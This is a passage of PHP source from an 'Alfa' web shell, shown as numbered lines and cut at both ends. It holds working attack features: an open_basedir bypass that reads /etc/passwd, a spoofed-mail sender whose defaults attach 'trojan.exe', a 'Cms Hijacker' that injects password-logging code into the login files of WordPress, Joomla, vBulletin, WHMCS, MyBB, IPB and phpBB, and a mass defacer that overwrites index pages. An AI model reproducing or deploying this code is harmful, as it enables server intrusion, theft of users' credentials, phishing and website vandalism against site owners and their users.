5478$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
5479}
5480@__write_file($d.'.htaccess',$code);
5481}
5482function alfabasedir(){
5483alfahead();
5484echo '<div class=header>
5485<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
5486$passwd = _alfa_file('/etc/passwd');
5487if(is_array($passwd)){
5488$users = array();
5489$makepwd = alfaMakePwd();
5490$basedir = @ini_get('open_basedir');
5491$safe_mode = @ini_get('safe_mode');
5492if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
5493$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
5494alfaWriteTocgiapi("basedir.alfa",$bash);
5495$bash_users = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
5496$users = json_decode($bash_users, true);
5497$x=count($users);
5498if($x>=2){array_pop($users);--$x;}
5499}
5500if(!$basedir&&!$safe_mode){
5501$x=0;
5502foreach($passwd as $str){
5503$pos = strpos($str,':');
5504$username = substr($str,0,$pos);
5505$dirz = str_replace("{user}", $username, $makepwd);
5506if(($username != '')){
5507if (@is_readable($dirz)){
5508array_push($users,$username);
5509$x++;
5510}}}
5511}
5512echo '<br><br>';
5513echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
5514echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
5515echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
5516foreach($users as $user){
5517if(empty($user))continue;
5518$path = str_replace("{user}", $user, $makepwd);
5519echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
5520}
5521}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
5522echo '<br><br></b>';
5523echo '</div>';
5524alfafooter();
5525}
5526function alfamail(){
5527alfahead();
5528echo '<div class=header>';
5529AlfaNum(8,9,10);
5530echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
5531$table = array(
5532'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
5533'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
5534'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
5535'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
5536'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
5537);
5538create_table($table);
5539echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
5540if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
5541$mail_to = $_POST['alfa1'];
5542$mail_from = $_POST['alfa2'];
5543$mail_subject = $_POST['alfa3'];
5544$mail_content = $_POST['alfa5'];
5545$count_mail = (int)$_POST['alfa6'];
5546$mail_attach = $_POST['alfa7'];
5547if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
5548if(!empty($mail_attach)&&@is_file($mail_attach)){
5549$file = $mail_attach;
5550$content = __read_file($file);
5551$content = chunk_split(__ZW5jb2Rlcg($content));
5552$uid = md5(uniqid(time()));
5553$filename = basename($file);
5554$headers = "From: ".$mail_from." <".$mail_from.">\r\n";
5555$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5556$headers .= "Reply-To: ".$mail_from."\r\n";
5557$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
5558$headers .= 'MIME-Version: 1.0' . "\r\n";
5559$headers .= 'X-Mailer: php' . "\r\n";
5560$mail_content = "--".$uid."\r\n";
5561$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
5562$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
5563$mail_content .= $mail_content."\r\n\r\n";
5564$mail_content .= "--".$uid."\r\n";
5565$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
5566$mail_content .= "Content-Transfer-Encoding: base64\r\n";
5567$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
5568$mail_content .= $content."\r\n\r\n";
5569$mail_content .= "--".$uid."--";
5570}else{
5571$headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
5572$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5573$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
5574$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
5575$headers .= 'MIME-Version: 1.0' . "\r\n";
5576$headers .= 'X-Mailer: php' . "\r\n";
5577}
5578if(empty($count_mail)||$count_mail<1)$count_mail=1;
5579if(!empty($mail_from)){echo __pre();
5580for($i=1;$i<=$count_mail;$i++){
5581if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
5582}}else{__alert("Invalid Mail From !");}
5583}else{__alert("Invalid Mail To !");}
5584}
5585echo('</div>');
5586alfafooter();
5587}
5588function alfaziper(){
5589alfahead();
5590AlfaNum(8,9,10);
5591echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
5592<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
5593<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
5594<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
5595<input type="submit" value=" " name="ziper" />
5596</form></center></p>';
5597if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
5598$dirzip = $_POST['alfa3'];
5599$zipfile = $_POST['alfa4'];
5600if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){
5601$code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
5602$newfunc = create_function('$source,$destination', $code);
5603if($newfunc($dirzip, $zipfile)){
5604echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
5605}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
5606}else{
5607alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &");
5608echo __pre().'<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
5609}}
5610echo '</div>';
5611alfafooter();
5612}
5613function alfacmshijacker(){
5614alfahead();
5615AlfaNum(5,6,7,8,9,10);
5616echo '<div class=header><br>
5617<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
5618<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
5619$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
5620foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
5621echo("</select>");
5622echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
5623SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
5624<input type="submit" name="btn" value=" "></form></center><br>';
5625$cms = $_POST['alfa1'];
5626$saveto = $_POST['alfa2'];
5627$cmspath = $_POST['alfa4'];
5628if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
5629echo __pre();
5630alfaHijackCms($cms,$cmspath,$saveto);
5631}
5632echo '</div>';
5633alfafooter();
5634}
5635function alfaHijackCms($cms,$cmspath,$saveto){
5636switch($cms){
5637case "vb":
5638hijackvBulletin($cmspath,$saveto);
5639break;
5640case "wp":
5641hijackwp($cmspath,$saveto);
5642break;
5643case "jom":
5644hijackJoomla($cmspath,$saveto);
5645break;
5646case "whmcs":
5647hijackWhmcs($cmspath,$saveto);
5648break;
5649case "mybb":
5650hijackMybb($cmspath,$saveto);
5651break;
5652case "ipb":
5653hijackIPB($cmspath,$saveto);
5654break;
5655case "phpbb":
5656hijackPHPBB($cmspath,$saveto);
5657break;
5658default:
5659echo "error!";
5660break;
5661}
5662}
5663function hijackvBulletin($path,$saveto){
5664$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5665$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
5666$code=str_replace('{saveto_path}',$saveto,$code);
5667$login = $path."/login.php";
5668$class = $path."/includes/class_bootstrap.php";
5669$dologin = 'do_login_redirect();';
5670$evil_login = "\t".$code."\n\t".$dologin;
5671$evil_class = "true";
5672if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
5673$data_login = @file_get_contents($login);
5674$data_class = @file_get_contents($class);
5675if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
5676$login_replace = str_replace($dologin,$evil_login, $data_login);
5677$class_replace = str_replace($clearpw,$evil_class, $data_class);
5678@file_put_contents($login, $login_replace);
5679@file_put_contents($class, $class_replace);
5680hijackOutput(0,$saveto);
5681}else{
5682hijackOutput(1);
5683}
5684}else{
5685hijackOutput(1);
5686}
5687}
5688function hijackwp($path,$saveto){
5689$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5690$redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
5691$code=str_replace('{saveto_path}',$saveto,$code);
5692$login=$path."/wp-login.php";
5693$evil_login = "\t".$redirect_wp."\n\t".$code;
5694if(@is_file($login) AND @is_writable($login)){
5695$data_login = @file_get_contents($login);
5696if(strstr($data_login, $redirect_wp)){
5697$login_replace = str_replace($redirect_wp,$evil_login, $data_login);
5698@file_put_contents($login, $login_replace);
5699hijackOutput(0,$saveto);
5700}else{
5701hijackOutput(1);
5702}
5703}else{
5704hijackOutput(1);
5705}
5706}
5707function hijackJoomla($path,$saveto){
5708$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
5709$code=str_replace('{saveto_path}',$saveto,$code);
5710$comp=$path."/administrator/components/com_login/";
5711if(@is_file($comp."/login.php")){
5712$login = $comp."/login.php";
5713}elseif(@is_file($comp."/admin.login.php")){
5714$login = $comp."/admin.login.php";
5715}else{
5716$login = '';
5717}
5718if(@is_file($login) AND @is_writable($login) AND $login != ''){
5719$data_login = @file_get_contents($login);
5720$evil_login = $code."\n".$data_login;
5721@file_put_contents($login, $evil_login);
5722hijackOutput(0,$saveto);
5723}else{
5724hijackOutput(1);
5725}
5726}
5727function hijackWhmcs($path,$saveto){
5728$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
5729$code=str_replace('{saveto_path}',$saveto,$code);
5730$conf=$path."/configuration.php";
5731if(@is_file($conf) AND @is_writable($conf)){
5732$data_conf = @file_get_contents($conf);
5733if(!strstr($data_conf,'?>'))$code = '?>'.$code;
5734$evil_conf = $data_conf."\n".$code;
5735@file_put_contents($conf, $evil_conf);
5736hijackOutput(0,$saveto);
5737}else{
5738hijackOutput(1);
5739}
5740}
5741function hijackMybb($path,$saveto){
5742$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
5743$find = '$loginhandler->complete_login();';
5744$code=str_replace('{saveto_path}',$saveto,$code);
5745$login=$path."/member.php";
5746$evil_login = "\t".$code."\n\t".$find;
5747if(@is_file($login) AND @is_writable($login)){
5748$data_login = @file_get_contents($login);
5749if(strstr($data_login, $find)){
5750$login_replace = str_replace($find,$evil_login, $data_login);
5751@file_put_contents($login, $login_replace);
5752hijackOutput(0,$saveto);
5753}else{
5754hijackOutput(1);
5755}
5756}else{
5757hijackOutput(1);
5758}
5759}
5760function hijackIPB($path,$saveto){
5761$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5762$find = 'unset( $member[\'plainPassword\'] );';
5763$code=str_replace('{saveto_path}',$saveto,$code);
5764$login=$path."/admin/sources/handlers/han_login.php";
5765$evil_login = "\t".$find."\n\t".$code;
5766if(@is_file($login) AND @is_writable($login)){
5767$data_login = @file_get_contents($login);
5768if(strstr($data_login, $find)){
5769$login_replace = str_replace($find,$evil_login, $data_login);
5770@file_put_contents($login, $login_replace);
5771hijackOutput(0,$saveto);
5772}else{
5773hijackOutput(1);
5774}
5775}else{
5776hijackOutput(1);
5777}
5778}
5779function hijackPHPBB($path,$saveto){
5780$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5781$find = 'case \'login\':';
5782$code=str_replace('{saveto_path}',$saveto,$code);
5783$login=$path."/ucp.php";
5784$evil_login = "\t".$find."\n\t".$code;
5785if(@is_file($login) AND @is_writable($login)){
5786$data_login = @file_get_contents($login);
5787if(strstr($data_login, $find)){
5788$login_replace = str_replace($find,$evil_login, $data_login);
5789@file_put_contents($login, $login_replace);
5790hijackOutput(0,$saveto);
5791}else{
5792hijackOutput(1);
5793}
5794}else{
5795hijackOutput(1);
5796}
5797}
5798function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
5799function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
5800if(@is_dir($dir)){
5801$files=@scandir($dir);
5802foreach($files as $key => $value){
5803$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
5804if(!@is_dir($path)){
5805if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
5806if($e=='str'){
5807$content = @file_get_contents($path);
5808if(strpos($content, $string) !== false){
5809echo str_replace('\\','/',$path) . "<br>";
5810}
5811}else{
5812if(strstr($value,$string)){
5813echo str_replace('\\','/',$path) . "<br>";
5814}
5815}
5816$results[] = $path;
5817}elseif($value != "." && $value != "..") {
5818Alfa_StrSearcher($path,$string,$ext,$e,$results);
5819$results[] = $path;
5820}}}}
5821function alfasearcher(){
5822alfahead();
5823echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
5824if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
5825echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
5826<div class="txtfont">
5827Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
5828Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
5829Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5830<input type="submit" name="btn" value=" "></div></form></center><br>';
5831$dir = $_POST['alfa2'];
5832$ext = $_POST['alfa3'];
5833$method = $_POST['alfa4'];
5834if($_POST['alfa5']=='>>'){
5835echo __pre();
5836if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
5837Alfa_Searcher($dir,trim($ext),$method);
5838}
5839}
5840if($_POST['alfa1']=='str'){
5841echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
5842<div class="txtfont">
5843Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
5844String: <input type="text" name="string" value="">
5845Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
5846Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5847<input type="submit" name="btn" value=" "></div></form></center><br>';
5848$dir = $_POST['alfa2'];
5849$string = $_POST['alfa3'];
5850$ext = $_POST['alfa5'];
5851if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
5852echo __pre();
5853Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
5854}
5855}
5856echo '</div>';
5857alfafooter();
5858}
5859function alfaMassDefacer(){
5860alfahead();
5861AlfaNum(5,6,7,8,9,10);
5862echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
5863echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
5864 Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
5865 DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
5866</form>';
5867$dir = $_POST['alfa1'];
5868$defpage = $_POST['alfa2'];
5869$method = $_POST['alfa3'];
5870$fCurrent = $GLOBALS['__file_path'];
5871if($_POST['alfa4'] == '>>'){
5872if(!empty($dir)){
5873if(@is_dir($dir)){
5874if(@is_readable($dir)){
5875if(@is_file($defpage)){
5876if($dh = @opendir($dir)){
5877echo __pre();
5878while (($file = @readdir($dh)) !== false){
5879if($file == '..' || $file == '.')continue;
5880$newfile=$dir.$file;
5881if($fCurrent == $newfile)continue;
5882if(@is_dir($newfile)){
5883Alfa_ReadDir($newfile,$method,$defpage);
5884}else{
5885if(!@is_writable($newfile))continue;
5886if(!@is_readable($newfile))continue;
5887Alfa_Rewriter($newfile,$file,$defpage,$method);
5888}
5889}
5890closedir($dh);
5891}else{__alert('<font color="red">Error In OpenDir...</font>');}
5892}else{__alert('<font color="red">DefPage File NotFound...</font>');}
5893}else{__alert('<font color="red">Directory is not Readable...</font>');}
5894}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
5895}else{__alert('<font color="red">Dir is Empty...</font>');}
5896}
5897echo '</div>';
5898alfafooter();
5899}
5900function Alfa_ReadDir($dir,$method='',$defpage=''){
5901if(!@is_readable($dir)) return false;
5902if (@is_dir($dir)) {
5903if ($dh = @opendir($dir)) {
5904while(($file=readdir($dh))!==false) {
5905if($file == '..' || $file == '.')continue;
5906$newfile=$dir.'/'.$file;
5907if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
5908if(@is_file($newfile)){
5909if(!@is_readable($newfile))continue;
5910Alfa_Rewriter($newfile,$file,$defpage,$method);
5911}
5912}
5913closedir($dh);
5914}
5915}
5916}
5917function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
5918if(!@is_writable($dir)) return false;
5919if(!@is_readable($dir)) return false;
5920$defpage=@file_get_contents($defpage);
5921if($m == 'index'){
5922$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
5923if(in_array(strtolower($file),$indexs)){
5924@file_put_contents($dir,$defpage);
5925echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
5926}
5927}elseif($m=='all'){
5928@file_put_contents($dir,$defpage);
5929echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
5930}
5931}
5932function alfaGetDisFunc(){
5933alfahead();
5934echo '<div class="header">';
5935$disfun = @ini_get('disable_functions');
5936$s = explode(',',$disfun);
5937$f = array_unique($s);
5938echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
5939$i=1;
5940foreach($f as $s){
5941$s=trim($s);
5942if(function_exists($s)||!is_callable($s))continue;
5943echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
5944echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
5945$i++;
5946}
5947echo '</table></center>';
5948echo '</div>';
5949alfafooter();
5950}
5951function Alfa_Create_A_Tag($action,$vals){
5952$nulls = array();
5953foreach($vals as $key => $val){
5954echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
5955for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
5956$f = implode(',',$nulls);
5957echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
5958unset($nulls);
5959}
5960}
5961function Alfa_Searcher($dir, $ext, $method) {
5962if(@is_readable($dir)){
5963if($method == 'all')$ext = '*';
5964if($method == 'dirs')$ext = '*';
5965$globFiles = @glob("$dir/*.$ext");
5966$globDirs = @glob("$dir/*", GLOB_ONLYDIR);
5967$blacklist = array();
5968foreach ($globDirs as $dir) {
5969if(!@is_readable($dir)) continue;
5970@Alfa_Searcher($dir, $ext, $method);
5971}
5972switch($method){
5973case "files":
5974foreach ($globFiles as $file){
5975if(@is_writable($file)){
5976echo "$file<br>";
5977}
5978}
5979break;
5980case "dirs":
5981foreach ($globFiles as $file){
5982if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
5983echo dirname($file).'<br>';
5984$blacklist[] = dirname($file);
5985}
5986}
5987break;
5988case "all":
5989foreach ($globFiles as $file){
5990echo $file.'<br>';
5991}
5992break;
5993}
5994unset($blacklist);
5995}
5996}
5997function AlfaiFrameCreator($f,$width='100%',$height='600px'){
5998return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
5999}
6000class AlfaCURL {
6001public $headers;
6002public $user_agent;
6003public $compression;
6004public $cookie_file;
6005public $proxy;
6006public $path;
6007public $ssl = false;
6008public $curl_status = true;
6009function __construct($cookies=false,$compression='gzip',$proxy=''){
6010if(!extension_loaded('curl')){$curl_status = false;return false;}
6011$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
6012$this->headers[] = 'Connection: Keep-Alive';
6013$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
6014$this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
6015$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
6016$this->compression=$compression;
6017$this->proxy=$proxy;
6018$this->cookies=$cookies;
6019if($this->cookies)$this->cookie($this->path);
6020}
6021function cookie($cookie_file) {
6022if (_alfa_file_exists($cookie_file,false)) {
6023$this->cookie_file=$cookie_file;
6024}else{
6025@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
6026$this->cookie_file=$cookie_file;
6027@fclose($this->cookie_file);
6028}
6029}
6030function Send($url,$method="get",$data=""){
6031if(!$this->curl_status){return false;}
6032$process = curl_init($url);
6033curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
6034curl_setopt($process, CURLOPT_HEADER, 0);
6035curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
6036curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
6037curl_setopt($process, CURLOPT_ENCODING , $this->compression);
